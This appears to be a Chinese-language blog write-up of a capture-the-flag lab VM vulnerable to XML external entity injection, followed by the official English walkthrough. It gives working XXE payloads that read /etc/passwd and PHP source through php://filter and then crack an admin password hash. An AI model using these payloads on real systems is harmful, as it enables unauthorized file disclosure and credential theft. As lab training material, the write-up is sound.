打开虚拟机运行环境(放着不动)
打开kali
因为都是net网卡,同一网段,进行nmap扫描,扫描到新ip地址,进入
看到网站先扫描目录
在kali用dirsearch -u 进行扫描,发现robots.txt有东西,那么看一看
打开君子协议,有xxe和admin.php,在url上修改
按理说admin.php也是存在的,但无法访问就很奇怪,只能先走下去
成功进入,打开brup准备抓包,发送到
在我们修改xml前,最好先改一个很正常的xml,而不是直接看password,防止服务器直接检测到攻击流量
准备操作,笔者这里的xml已经改过了,可以看到关于密码和用户名的是xml,那么就可以考虑用xxe注入
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>
修改xml处代码,
再修改xml处代码,我们还有一个线索可以用,是之前的admin.php,所以我们这么构造xml代码:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>
可以看到有很多乱码,学过密码学的可能会有想法,这里我就直接用brup自带的base64进行解码
解码
成功解码,但发现密码还要被一次md5解码,https://www.cmd5.com/,进行解码
成功解码,现在已知:
用户名:administhebest
密码:admin@123
而且现在也没有线索了,那么就用这个密码试试看,
试试看登录
成功登录(这是我们是用admin.php破出来的密码,自然只能在admin.php登录,这很合理)
打开flag
发现有一串新路径:flagmeout.php
那么把之前构造的admin.php改成flagmeout.php试试看
好,学过密码学的同学应该>>>
ok还是base64解码,但解压出来乱码,这里就真的是要学过密码学了,不然可不知道这要怎么解码
用的是base32((SimplyCalc) base32 decoder)
解码出来是/etc/.flag.php
好那么重新修改xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>
然后解码,啊怎么是乱码?其实你没做错,我感觉是出题者的锅(bushi),接下来你肯定想不到,居然是新建一个php把乱码直接塞进去
然后在浏览器打开
可以看到flag了,只能说xml很神奇吧Failure evaluating code: SAFCSP{xxe_is_so_easy}
靶机我就不发了,1.3G有点大的,网上也应该找的到的.
官方英文攻略下方:
1: access the VM ip on port 80.
--------------------------------------------------
2: by checking (robots.txt) we can see there is a (xxe) folder and admin.php be sure the admin.php not in the web root and try it in the xxe folder.
--------------------------------------------------
3: IP/xxe will show a login page that has been vulnerable to Xml Xternal Entity(XXE).
--------------------------------------------------
4: submit the form and intercept it will show an xml post.
--------------------------------------------------
5: edit xml tags to test xxe
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>
(it will show (/etc/passwd)
--------------------------------------------------
6: change file:///etc/passwd to read admin.php content
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>
--------------------------------------------------
7: we now got the content encoded to base64 after decode it we got this line
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
user name and password decrypt the pass using google will show (admin@123).
--------------------------------------------------
8: administhebest:admin@123 we login as admin it will let you access the admin.php and show us flag with hyperLink to flagmeout.php -> in the same folder but the code send us to web root lets test /xxe/flagmeout.php it will open and by source view can see a comment says ( <!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) --> )
--------------------------------------------------
9: decode JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 using Base32 (http://www.simplycalc.com/base32-decode.php) we get a Base64 we decoded it ( /etc/.flag.php )
--------------------------------------------------
10: access the file (/etc/.flag.php)
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>
or simply without php://filter (<!ENTITY sp SYSTEM "/etc/.flag.php">) we got the code.
--------------------------------------------------
11: decode Base64 will show phpnonalpha2 code save it in your computer .e.g flag.php (make sure to add <?php and ?> to the code because it is php.
--------------------------------------------------
12: open terminal and type (php flag.php) will show error in the code but last line will show a flag says (SAFCSP{xxe_is_so_easy}).
610
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
